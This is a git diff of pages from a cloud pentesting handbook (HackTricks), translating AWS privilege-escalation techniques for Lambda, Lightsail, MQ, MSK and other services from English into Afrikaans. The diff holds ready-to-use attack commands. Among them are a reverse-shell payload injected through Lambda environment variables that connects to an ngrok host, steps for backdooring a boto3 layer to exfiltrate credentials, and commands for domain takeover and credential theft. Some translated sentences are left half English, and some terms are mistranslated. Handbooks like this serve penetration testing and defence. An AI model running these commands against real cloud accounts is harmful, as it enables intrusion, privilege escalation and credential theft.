-**Potential Impact:** Direct privesc to the arbitrary lambda service role specified.
+**Potensiële Impak:** Direkte privesc na die arbitrêre lambda diensrol wat gespesifiseer is.
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateEventSourceMapping`
 
-Users with **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:CreateEventSourceMapping`** permissions (and potentially `dynamodb:PutItem` and `dynamodb:CreateTable`) can indirectly **escalate privileges** even without `lambda:InvokeFunction`.\
-They can create a **Lambda function with malicious code and assign it an existing IAM role**.
-
-Instead of directly invoking the Lambda, the user sets up or utilizes an existing DynamoDB table, linking it to the Lambda through an event source mapping. This setup ensures the Lambda function is **triggered automatically upon a new item** entry in the table, either by the user's action or another process, thereby indirectly invoking the Lambda function and executing the code with the permissions of the passed IAM role.
+Gebruikers met **`iam:PassRole`, `lambda:CreateFunction`, en `lambda:CreateEventSourceMapping`** toestemmings (en moontlik `dynamodb:PutItem` en `dynamodb:CreateTable`) kan indirek **privileges verhoog** selfs sonder `lambda:InvokeFunction`.\
+Hulle kan 'n **Lambda-funksie met kwaadwillige kode skep en dit aan 'n bestaande IAM-rol toewys**.
 
+In plaas daarvan om die Lambda direk aan te roep, stel die gebruiker 'n bestaande DynamoDB-tabel op of gebruik dit, en koppel dit aan die Lambda deur middel van 'n gebeurtenisbron-mapping. Hierdie opstelling verseker dat die Lambda-funksie **automaties geaktiveer word wanneer 'n nuwe item** in die tabel ingevoer word, hetsy deur die gebruiker se aksie of 'n ander proses, en roep dus indirek die Lambda-funksie aan en voer die kode uit met die toestemmings van die oorgedraagde IAM-rol.
 ```bash
 aws lambda create-function --function-name my_function \
-    --runtime python3.8 --role <arn_of_lambda_role> \
-    --handler lambda_function.lambda_handler \
-    --zip-file fileb://rev.zip
+--runtime python3.8 --role <arn_of_lambda_role> \
+--handler lambda_function.lambda_handler \
+--zip-file fileb://rev.zip
 ```
-
-If DynamoDB is already active in the AWS environment, the user only **needs to establish the event source mapping** for the Lambda function. However, if DynamoDB isn't in use, the user must **create a new table** with streaming enabled:
-
+As DynamoDB reeds aktief is in die AWS-omgewing, moet die gebruiker net **die gebeurtenisbronkaart** vir die Lambda-funksie opstel. As DynamoDB egter nie in gebruik is nie, moet die gebruiker **nuwe tabel** met streaming geaktiveer skep:
 ```bash
 aws dynamodb create-table --table-name my_table \
-    --attribute-definitions AttributeName=Test,AttributeType=S \
-    --key-schema AttributeName=Test,KeyType=HASH \
-    --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
-    --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES
+--attribute-definitions AttributeName=Test,AttributeType=S \
+--key-schema AttributeName=Test,KeyType=HASH \
+--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
+--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES
 ```
-
-Now it's posible **connect the Lambda function to the DynamoDB table** by **creating an event source mapping**:
-
+Nou is dit moontlik **om die Lambda-funksie aan die DynamoDB-tabel te koppel** deur **'n gebeurtenisbronkaart te skep**:
 ```bash
 aws lambda create-event-source-mapping --function-name my_function \
-    --event-source-arn <arn_of_dynamodb_table_stream> \
-    --enabled --starting-position LATEST
+--event-source-arn <arn_of_dynamodb_table_stream> \
+--enabled --starting-position LATEST
 ```
-
-With the Lambda function linked to the DynamoDB stream, the attacker can **indirectly trigger the Lambda by activating the DynamoDB stream**. This can be accomplished by **inserting an item** into the DynamoDB table:
-
+Met die Lambda-funksie wat aan die DynamoDB-stroom gekoppel is, kan die aanvaller **indirek die Lambda aktiveer deur die DynamoDB-stroom te aktiveer**. Dit kan bereik word deur **'n item in die DynamoDB-tabel in te voeg**:
 ```bash
 aws dynamodb put-item --table-name my_table \
-    --item Test={S="Random string"}
+--item Test={S="Random string"}
 ```
-
-**Potential Impact:** Direct privesc to the lambda service role specified.
+**Potensiële Impak:** Direkte privesc na die lambda diensrol gespesifiseer.
 
 ### `lambda:AddPermission`
 
-An attacker with this permission can **grant himself (or others) any permissions** (this generates resource based policies to grant access to the resource):
-
+'n Aanvaller met hierdie toestemming kan **homself (of ander) enige toestemmings gee** (dit genereer hulpbron-gebaseerde beleide om toegang tot die hulpbron te verleen):
 ```bash
 # Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode)
 aws lambda add-permission --function-name <func_name> --statement-id asdasd --action '*' --principal arn:<your user arn>
@@ -147,51 +130,44 @@ aws lambda add-permission --function-name <func_name> --statement-id asdasd --ac
 # Invoke the function
 aws lambda invoke --function-name <func_name> /tmp/outout
 ```
-
-**Potential Impact:** Direct privesc to the lambda service role used by granting permission to modify the code and run it.
+**Potensiële Impak:** Direkte privesc na die lambda diensrol wat gebruik word deur toestemming te gee om die kode te wysig en dit uit te voer.
 
 ### `lambda:AddLayerVersionPermission`
 
-An attacker with this permission can **grant himself (or others) the permission `lambda:GetLayerVersion`**. He could access the layer and search for vulnerabilities or sensitive information
-
+'n Aanvaller met hierdie toestemming kan **homself (of ander) die toestemming `lambda:GetLayerVersion` gee**. Hy kan toegang tot die laag verkry en soek na kwesbaarhede of sensitiewe inligting.
 ```bash
 # Give everyone the permission lambda:GetLayerVersion
 aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion
 ```
-
-**Potential Impact:** Potential access to sensitive information.
+**Potensiële Impak:** Potensiële toegang tot sensitiewe inligting.
 
 ### `lambda:UpdateFunctionCode`
 
-Users holding the **`lambda:UpdateFunctionCode`** permission has the potential to **modify the code of an existing Lambda function that is linked to an IAM role.**\
-The attacker can **modify the code of the lambda to exfiltrate the IAM credentials**.
-
-Although the attacker might not have the direct ability to invoke the function, if the Lambda function is pre-existing and operational, it's probable that it will be triggered through existing workflows or events, thus indirectly facilitating the execution of the modified code.
+Gebruikers wat die **`lambda:UpdateFunctionCode`** toestemming het, het die potensiaal om die **kode van 'n bestaande Lambda-funksie wat aan 'n IAM-rol gekoppel is, te wysig.**\
+Die aanvaller kan **die kode van die lambda wysig om die IAM-akkrediteerings te eksfiltreer**.
 
+Alhoewel die aanvaller dalk nie die direkte vermoë het om die funksie aan te roep nie, as die Lambda-funksie reeds bestaan en operasioneel is, is dit waarskynlik dat dit geaktiveer sal word deur bestaande werksvloei of gebeurtenisse, wat indirek die uitvoering van die gewysigde kode fasiliteer.
 ```bash
 # The zip should contain the lambda code (trick: Download the current one and add your code there)
 aws lambda update-function-code --function-name target_function \
-    --zip-file fileb:///my/lambda/code/zipped.zip
+--zip-file fileb:///my/lambda/code/zipped.zip
 
 # If you have invoke permissions:
 aws lambda invoke --function-name my_function output.txt
 
 # If not check if it's exposed in any URL or via an API gateway you could access
 ```
-
-**Potential Impact:** Direct privesc to the lambda service role used.
+**Potensiële Impak:** Direkte privesc na die lambda diensrol wat gebruik word.
 
 ### `lambda:UpdateFunctionConfiguration`
 
-#### RCE via env variables
-
-With this permissions it's possible to add environment variables that will cause the Lambda to execute arbitrary code. For example in python it's possible to abuse the environment variables `PYTHONWARNING` and `BROWSER` to make a python process execute arbitrary commands:
+#### RCE via omgewing veranderlikes
 
+Met hierdie toestemmings is dit moontlik om omgewing veranderlikes by te voeg wat die Lambda sal laat uitvoer willekeurige kode. Byvoorbeeld, in python is dit moontlik om die omgewing veranderlikes `PYTHONWARNING` en `BROWSER` te misbruik om 'n python-proses willekeurige opdragte te laat uitvoer:
 ```bash
 aws --profile none-priv lambda update-function-configuration --function-name <func-name> --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}"
 ```
-
-For other scripting languages there are other env variables you can use. For more info check the subsections of scripting languages in:
+Vir ander skripting tale is daar ander omgewingsveranderlikes wat jy kan gebruik. Vir meer inligting, kyk na die subafdelings van skripting tale in:
 
 {{#ref}}
 https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse
@@ -199,19 +175,17 @@ https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalat
 
 #### RCE via Lambda Layers
 
-[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) allows to include **code** in your lamdba function but **storing it separately**, so the function code can stay small and **several functions can share code**.
-
-Inside lambda you can check the paths from where python code is loaded with a function like the following:
+[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) laat jou toe om **kode** in jou lambda funksie in te sluit, maar **dit apart te stoor**, sodat die funksiekode klein kan bly en **verskeie funksies kode kan deel**.
 
+Binne lambda kan jy die paaie nagaan waarvandaan python kode gelaai word met 'n funksie soos die volgende:
 ```python
 import json
 import sys
 
 def lambda_handler(event, context):
-    print(json.dumps(sys.path, indent=2))
+print(json.dumps(sys.path, indent=2))
 ```
-
-These are the places:
+Hierdie is die plekke:
 
 1. /var/task
 2. /opt/python/lib/python3.7/site-packages
@@ -224,73 +198,61 @@ These are the places:
 9. /opt/python/lib/python3.7/site-packages
 10. /opt/python
 
-For example, the library boto3 is loaded from `/var/runtime/boto3` (4th position).
+Byvoorbeeld, die biblioteek boto3 word gelaai vanaf `/var/runtime/boto3` (4de posisie).
 
-#### Exploitation
+#### Exploitatie
 
-It's possible to abuse the permission `lambda:UpdateFunctionConfiguration` to **add a new layer** to a lambda function. To execute arbitrary code this layer need to contain some **library that the lambda is going to import.** If you can read the code of the lambda, you could find this easily, also note that it might be possible that the lambda is **already using a layer** and you could **download** the layer and **add your code** in there.
-
-For example, lets suppose that the lambda is using the library boto3, this will create a local layer with the last version of the library:
+Dit is moontlik om die toestemming `lambda:UpdateFunctionConfiguration` te misbruik om **'n nuwe laag** by 'n lambda-funksie te **voeg**. Om arbitrêre kode uit te voer, moet hierdie laag 'n **biblioteek bevat wat die lambda gaan invoer.** As jy die kode van die lambda kan lees, kan jy dit maklik vind, let ook daarop dat dit moontlik is dat die lambda **reeds 'n laag gebruik** en jy kan die laag **aflaai** en **jou kode** daarby voeg.
 
+Byvoorbeeld, kom ons neem aan dat die lambda die biblioteek boto3 gebruik, dit sal 'n plaaslike laag met die laaste weergawe van die biblioteek skep:
 ```bash
 pip3 install -t ./lambda_layer boto3
 ```
+You can open `./lambda_layer/boto3/__init__.py` and **voeg die agterdeur in die globale kode by** (n funksie om akrediteerbare te exfiltreer of 'n omgekeerde skulp te kry byvoorbeeld).
 
-You can open `./lambda_layer/boto3/__init__.py` and **add the backdoor in the global code** (a function to exfiltrate credentials or get a reverse shell for example).
-
-Then, zip that `./lambda_layer` directory and **upload the new lambda layer** in your own account (or in the victims one, but you might not have permissions for this).\
-Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **compatible with the python version** used by the lambda and if you upload it to your account, it needs to be in the **same region:**
-
+Then, zip that `./lambda_layer` directory and **laai die nuwe lambda-laag op** in jou eie rekening (of in die slagoffer s'n, maar jy mag dalk nie toestemming hê nie).\
+Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **kompatibel met die python weergawe** wat deur die lambda gebruik word en as jy dit na jou rekening oplaai, moet dit in die **dieselfde streek** wees:
 ```bash
 aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
 ```
-
-Now, make the uploaded lambda layer **accessible by any account**:
-
+Nou, maak die opgelaaide lambda-laag **toeganklik vir enige rekening**:
 ```bash
 aws lambda add-layer-version-permission --layer-name boto3 \
-    --version-number 1 --statement-id public \
-    --action lambda:GetLayerVersion --principal *
+--version-number 1 --statement-id public \
+--action lambda:GetLayerVersion --principal *
 ```
-
-And attach the lambda layer to the victim lambda function:
-
+En heg die lambda-laag aan die slagoffer lambda-funksie:
 ```bash
 aws lambda update-function-configuration \
-    --function-name <func-name> \
-    --layers arn:aws:lambda:<region>:<attacker-account-id>:layer:boto3:1 \
-    --timeout 300 #5min for rev shells
+--function-name <func-name> \
+--layers arn:aws:lambda:<region>:<attacker-account-id>:layer:boto3:1 \
+--timeout 300 #5min for rev shells
 ```
+Die volgende stap sal wees om of **die funksie** self aan te roep as ons kan of om te wag totdat dit **aangeroep word** deur normale middele – wat die veiliger metode is.
 
-The next step would be to either **invoke the function** ourselves if we can or to wait until i**t gets invoked** by normal means–which is the safer method.
-
-A **more stealth way to exploit this vulnerability** can be found in:
+'n **Meer stealth manier om hierdie kwesbaarheid te benut** kan gevind word in:
 
 {{#ref}}
 ../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
 {{#endref}}
 
-**Potential Impact:** Direct privesc to the lambda service role used.
+**Potensiële Impak:** Direkte privesc na die lambda diensrol wat gebruik word.
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateFunctionUrlConfig`, `lambda:InvokeFunctionUrl`
 
-Maybe with those permissions you are able to create a function and execute it calling the URL... but I could find a way to test it, so let me know if you do!
+Miskien met daardie toestemmings kan jy 'n funksie skep en dit uitvoer deur die URL aan te roep... maar ek kon nie 'n manier vind om dit te toets nie, so laat weet my as jy dit doen!
 
 ### Lambda MitM
 
-Some lambdas are going to be **receiving sensitive info from the users in parameters.** If get RCE in one of them, you can exfiltrate the info other users are sending to it, check it in:
+Sommige lambdas gaan **sensitiewe inligting van die gebruikers in parameters ontvang.** As jy RCE in een van hulle kry, kan jy die inligting wat ander gebruikers na dit stuur, uitvange, kyk dit in:
 
 {{#ref}}
 ../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
 {{#endref}}
 
-## References
+## Verwysings
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md
index 1bf78eb3c..25935732b 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md
@@ -4,112 +4,93 @@
 
 ## Lightsail
 
-For more information about Lightsail check:
+Vir meer inligting oor Lightsail, kyk:
 
 {{#ref}}
 ../aws-services/aws-lightsail-enum.md
 {{#endref}}
 
 > [!WARNING]
-> It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service.
+> Dit is belangrik om te noem dat Lightsail **nie IAM rolle wat aan die gebruiker behoort gebruik nie** maar aan 'n AWS bestuurde rekening, so jy kan nie hierdie diens misbruik om privesc te doen nie. Tog, **sensitiewe data** soos kode, API sleutels en databasis inligting kan in hierdie diens gevind word.
 
 ### `lightsail:DownloadDefaultKeyPair`
 
-This permission will allow you to get the SSH keys to access the instances:
-
+Hierdie toestemming sal jou toelaat om die SSH sleutels te kry om toegang tot die instansies te verkry:
 ```
 aws lightsail download-default-key-pair
 ```
-
-**Potential Impact:** Find sensitive info inside the instances.
+**Potensiële Impak:** Vind sensitiewe inligting binne die instansies.
 
 ### `lightsail:GetInstanceAccessDetails`
 
-This permission will allow you to generate SSH keys to access the instances:
-
+Hierdie toestemming sal jou toelaat om SSH-sleutels te genereer om toegang tot die instansies te verkry:
 ```bash
 aws lightsail get-instance-access-details --instance-name <instance_name>
 ```
-
-**Potential Impact:** Find sensitive info inside the instances.
+**Potensiële Impak:** Vind sensitiewe inligting binne die instansies.
 
 ### `lightsail:CreateBucketAccessKey`
 
-This permission will allow you to get a key to access the bucket:
-
+Hierdie toestemming sal jou toelaat om 'n sleutel te kry om toegang tot die emmer te verkry:
 ```bash
 aws lightsail create-bucket-access-key --bucket-name <name>
 ```
-
-**Potential Impact:** Find sensitive info inside the bucket.
+**Potensiële Impak:** Vind sensitiewe inligting binne die emmer.
 
 ### `lightsail:GetRelationalDatabaseMasterUserPassword`
 
-This permission will allow you to get the credentials to access the database:
-
+Hierdie toestemming sal jou toelaat om die geloofsbriewe te verkry om toegang tot die databasis te verkry:
 ```bash
 aws lightsail get-relational-database-master-user-password --relational-database-name <name>
 ```
-
-**Potential Impact:** Find sensitive info inside the database.
+**Potensiële Impak:** Vind sensitiewe inligting binne die databasis.
 
 ### `lightsail:UpdateRelationalDatabase`
 
-This permission will allow you to change the password to access the database:
-
+Hierdie toestemming sal jou toelaat om die wagwoord te verander om toegang tot die databasis te verkry:
 ```bash
 aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>
 ```
-
-If the database isn't public, you could also make it public with this permissions with
-
+As die databasis nie publiek is nie, kan jy dit ook publiek maak met hierdie toestemmings met
 ```bash
 aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible
 ```
-
-**Potential Impact:** Find sensitive info inside the database.
+**Potensiële Impak:** Vind sensitiewe inligting binne die databasis.
 
 ### `lightsail:OpenInstancePublicPorts`
 
-This permission allow to open ports to the Internet
-
+Hierdie toestemming laat toe om poorte na die Internet te open.
 ```bash
 aws lightsail open-instance-public-ports \
-    --instance-name MEAN-2 \
-    --port-info fromPort=22,protocol=TCP,toPort=22
+--instance-name MEAN-2 \
+--port-info fromPort=22,protocol=TCP,toPort=22
 ```
-
-**Potential Impact:** Access sensitive ports.
+**Potensiële Impak:** Toegang tot sensitiewe poorte.
 
 ### `lightsail:PutInstancePublicPorts`
 
-This permission allow to open ports to the Internet. Note taht the call will close any port opened not specified on it.
-
+Hierdie toestemming laat toe om poorte na die Internet oop te maak. Let daarop dat die oproep enige poort wat nie daarop gespesifiseer is nie, sal sluit.
 ```bash
 aws lightsail put-instance-public-ports \
-    --instance-name MEAN-2 \
-    --port-infos fromPort=22,protocol=TCP,toPort=22
+--instance-name MEAN-2 \
+--port-infos fromPort=22,protocol=TCP,toPort=22
 ```
-
-**Potential Impact:** Access sensitive ports.
+**Potensiële Impak:** Toegang tot sensitiewe poorte.
 
 ### `lightsail:SetResourceAccessForBucket`
 
-This permissions allows to give an instances access to a bucket without any extra credentials
-
+Hierdie toestemming laat toe om 'n instansie toegang tot 'n emmer te gee sonder enige ekstra akrediteer.
 ```bash
 aws set-resource-access-for-bucket \
-    --resource-name <instance-name> \
-    --bucket-name <bucket-name> \
-    --access allow
+--resource-name <instance-name> \
+--bucket-name <bucket-name> \
+--access allow
 ```
-
-**Potential Impact:** Potential new access to buckets with sensitive information.
+**Potensiële Impak:** Potensiële nuwe toegang tot emmers met sensitiewe inligting.
 
 ### `lightsail:UpdateBucket`
 
-With this permission an attacker could grant his own AWS account read access over buckets or even make the buckets public to everyone:
-
+Met hierdie toestemming kan 'n aanvaller sy eie AWS-rekening leestoegang oor emmers verleen of selfs die emmers publiek maak vir almal:
 ```bash
 # Grant read access to exterenal account
 aws update-bucket --bucket-name <value> --readonly-access-accounts <external_account>
@@ -120,47 +101,36 @@ aws update-bucket --bucket-name <value> --access-rules getObject=public,allowPub
 # Bucket private but single objects can be public
 aws update-bucket --bucket-name <value> --access-rules getObject=private,allowPublicOverrides=true
 ```
-
-**Potential Impact:** Potential new access to buckets with sensitive information.
+**Potensiële Impak:** Potensiële nuwe toegang tot emmers met sensitiewe inligting.
 
 ### `lightsail:UpdateContainerService`
 
-With this permissions an attacker could grant access to private ECRs from the containers service
-
+Met hierdie toestemmings kan 'n aanvaller toegang tot private ECR's van die houerdiens verleen.
 ```bash
 aws update-container-service \
-    --service-name <name> \
-    --private-registry-access ecrImagePullerRole={isActive=boolean}
+--service-name <name> \
+--private-registry-access ecrImagePullerRole={isActive=boolean}
 ```
-
-**Potential Impact:** Get sensitive information from private ECR
+**Potensiële Impak:** Kry sensitiewe inligting van private ECR
 
 ### `lightsail:CreateDomainEntry`
 
-An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address.
-
+'n Aanvaller met hierdie toestemming kan 'n subdomein skep en dit na sy eie IP-adres wys (subdomein oorname), of 'n SPF-record opstel wat hom toelaat om e-posse van die domein te vervals, of selfs die hoofdomein na sy eie IP-adres stel.
 ```bash
 aws lightsail create-domain-entry \
-    --domain-name example.com \
-    --domain-entry name=dev.example.com,type=A,target=192.0.2.0
+--domain-name example.com \
+--domain-entry name=dev.example.com,type=A,target=192.0.2.0
 ```
-
-**Potential Impact:** Takeover a domain
+**Potensiële Impak:** Neem 'n domein oor
 
 ### `lightsail:UpdateDomainEntry`
 
-An attacker with this permission could create subdomain and point it to his own IP address (subdomain takeover), or craft a SPF record that allows him so spoof emails from the domain, or even set the main domain his own IP address.
-
+'n Aanvaller met hierdie toestemming kan 'n subdomein skep en dit na sy eie IP-adres wys (subdomein oorname), of 'n SPF-record opstel wat hom toelaat om e-posse van die domein te vervals, of selfs die hoofdomein na sy eie IP-adres stel.
 ```bash
 aws lightsail update-domain-entry \
-    --domain-name example.com \
-    --domain-entry name=dev.example.com,type=A,target=192.0.2.0
+--domain-name example.com \
+--domain-entry name=dev.example.com,type=A,target=192.0.2.0
 ```
-
-**Potential Impact:** Takeover a domain
+**Potensiële Impak:** Neem 'n domein oor
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md
index a1004bde6..eec19a3f1 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md
@@ -4,26 +4,18 @@
 
 ### `mediapackage:RotateChannelCredentials`
 
-Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials)
-
+Verander die Kanaal se eerste IngestEndpoint se gebruikersnaam en wagwoord. (Hierdie API is verouderd vir RotateIngestEndpointCredentials)
 ```bash
 aws mediapackage rotate-channel-credentials --id <value>
 ```
-
 ### `mediapackage:RotateIngestEndpointCredentials`
 
-Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials)
-
+Verander die Kanaal se eerste IngestEndpoint se gebruikersnaam en wagwoord. (Hierdie API is verouderd vir RotateIngestEndpointCredentials)
 ```bash
 aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63
 ```
-
-## References
+## Verwysings
 
 - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md
index 80890e389..ca9069080 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md
@@ -4,7 +4,7 @@
 
 ## MQ
 
-For more information about MQ check:
+Vir meer inligting oor MQ, kyk:
 
 {{#ref}}
 ../aws-services/aws-mq-enum.md
@@ -12,42 +12,32 @@ For more information about MQ check:
 
 ### `mq:ListBrokers`, `mq:CreateUser`
 
-With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ):
-
+Met daardie toestemmings kan jy **'n nuwe gebruiker in 'n ActimeMQ broker skep** (dit werk nie in RabbitMQ nie):
 ```bash
 aws mq list-brokers
 aws mq create-user --broker-id <value> --console-access --password <value> --username <value>
 ```
-
-**Potential Impact:** Access sensitive info navigating through ActiveMQ
+**Potensiële Impak:** Toegang tot sensitiewe inligting deur ActiveMQ te navigeer
 
 ### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser`
 
-With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ):
-
+Met daardie toestemmings kan jy **'n nuwe gebruiker in 'n ActimeMQ broker skep** (dit werk nie in RabbitMQ nie):
 ```bash
 aws mq list-brokers
 aws mq list-users --broker-id <value>
 aws mq update-user --broker-id <value> --console-access --password <value> --username <value>
 ```
-
-**Potential Impact:** Access sensitive info navigating through ActiveMQ
+**Potensiële Impak:** Toegang tot sensitiewe inligting deur ActiveMQ te navigeer
 
 ### `mq:ListBrokers`, `mq:UpdateBroker`
 
-If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**.
-
+As 'n broker **LDAP** vir outorisering met **ActiveMQ** gebruik. Dit is moontlik om die **konfigurasie** van die LDAP-bediener wat gebruik word, te **verander** na **een wat deur die aanvaller beheer word**. Op hierdie manier sal die aanvaller in staat wees om **alle geloofsbriewe wat deur LDAP gestuur word, te steel**.
 ```bash
 aws mq list-brokers
 aws mq update-broker --broker-id <value> --ldap-server-metadata=...
 ```
+As jy op een of ander manier die oorspronklike geloofsbriewe wat deur ActiveMQ gebruik is, kan vind, kan jy 'n MitM uitvoer, die geloofsbriewe steel, dit in die oorspronklike bediener gebruik, en die antwoord stuur (misschien net die gesteelde geloofsbriewe hergebruik, jy kan dit doen).
 
-If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this).
-
-**Potential Impact:** Steal ActiveMQ credentials
+**Potensiële Impak:** Steel ActiveMQ geloofsbriewe
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md
index f0538785f..85beb09d3 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md
@@ -4,7 +4,7 @@
 
 ## MSK
 
-For more information about MSK (Kafka) check:
+Vir meer inligting oor MSK (Kafka) kyk:
 
 {{#ref}}
 ../aws-services/aws-msk-enum.md
@@ -12,17 +12,11 @@ For more information about MSK (Kafka) check:
 
 ### `msk:ListClusters`, `msk:UpdateSecurity`
 
-With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them.
-
+Met hierdie **privileges** en **toegang tot die VPC waar die kafka brokers is**, kan jy die **Geen outentisering** byvoeg om toegang tot hulle te verkry.
 ```bash
 aws msk --client-authentication <value> --cluster-arn <value> --current-version <value>
 ```
-
-You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\
-If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it.
+Jy het toegang tot die VPC nodig omdat **jy kan nie Geen outentikasie met Kafka publiek** blootgestel aktiveer nie. As dit publiek blootgestel is, as **SASL/SCRAM** outentikasie gebruik word, kan jy **die geheim lees** om toegang te verkry (jy sal addisionele voorregte nodig hê om die geheim te lees).\
+As **IAM rol-gebaseerde outentikasie** gebruik word en **kafka publiek blootgestel** is, kan jy steeds hierdie voorregte misbruik om jou toestemmings te gee om toegang te verkry.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md
index 7d43bbd3b..4d931a943 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md
@@ -2,21 +2,17 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Organizations
+## Organisasies
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-organizations-enum.md
 {{#endref}}
 
-## From management Account to children accounts
+## Van bestuurrekening na kindrekening
 
-If you compromise the root/management account, chances are you can compromise all the children accounts.\
-To [**learn how check this page**](../#compromising-the-organization).
+As jy die wortel/bestuurrekening kompromitteer, is daar 'n goeie kans dat jy al die kindrekeninge kan kompromitteer.\
+Om [**te leer hoe, kyk hierdie bladsy**](../#compromising-the-organization).
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md
index b4a08093e..95493f3b9 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md
@@ -2,9 +2,9 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## RDS - Relational Database Service
+## RDS - Relasionele Databasisdiens
 
-For more information about RDS check:
+Vir meer inligting oor RDS, kyk:
 
 {{#ref}}
 ../aws-services/aws-relational-database-rds-enum.md
@@ -12,59 +12,54 @@ For more information about RDS check:
 
 ### `rds:ModifyDBInstance`
 
-With that permission an attacker can **modify the password of the master user**, and the login inside the database:
-
